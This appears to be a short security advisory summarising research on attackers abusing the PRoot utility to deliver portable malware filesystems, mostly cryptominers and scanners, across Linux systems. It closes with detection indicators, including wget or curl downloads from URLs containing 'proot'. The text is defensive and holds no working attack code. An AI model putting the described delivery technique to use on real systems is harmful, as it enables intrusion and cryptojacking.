Researchers at Sysdig have uncovered a novel technique being used by threat actors to simplify attacks and increase the successful repeated use of malicious tooling across various Linux platforms. PRoot, a legitimate open-source Linux utility, is described by its creator as “…a user-space implementation of chroot, mount –bind, and binfmt_misc. This means that users don’t need any privileges or setup to do things like using an arbitrary directory as the new root filesystem, making files accessible somewhere else in the filesystem hierarchy, or executing programs built for another CPU architecture transparently through QEMU user-mode.”
In concert with PRoot, a threat actor is able to create their own custom file system containing their malicious payloads and toolkits that can be delivered to victim devices and mounted using PRoot. Deploying malware in this way benefits the threat actor by greatly increasing the compatibility of the malware across different types of Linux operating systems by providing a consistent operational environment, or by using Quick Emulation (QEMU) to bridge incompatible CPU architectures. For example, a piece of malware could be written for ARM architecture, but still be used on an x86 based system. Because of the increased compatibility provided to malware in this way, threat actors can scale operations quickly and efficiently without being slowed down by the many potential differences between Linux systems that could cause their malware to fail.
Sysdig states that the most common usage of this technique that they have observed, is to deliver and run the popular cryptocurrency miner XMRig, and in some cases reconnaissance tools like masscan or nmap. However, this technique could also be used to deploy a practically limitless number of malicious programs with ease.
Threat actors observed using this technique have been able to utilize free file sharing services like Google Drive, Dropbox, or OneDrive to host their compressed filesystem containing their malware, making them readily accessible from victim devices. Organizations should be sure to monitor for connections to these file sharing services, especially ones that are not commonly used for an organization’s business processes.
Organizations may also find it useful to monitor for the execution of the PRoot tool, executed on the command line simply as ‘./proot’. The researchers at Sysdig noted that, in the attacks that they observed, the malicious filesystems were mounted to “/tmp/PRoot”, though it could potentially be mounted in a large number of places. The usage of wget or curl followed by a URL containing the string “proot” should be a red flag for this type of attack.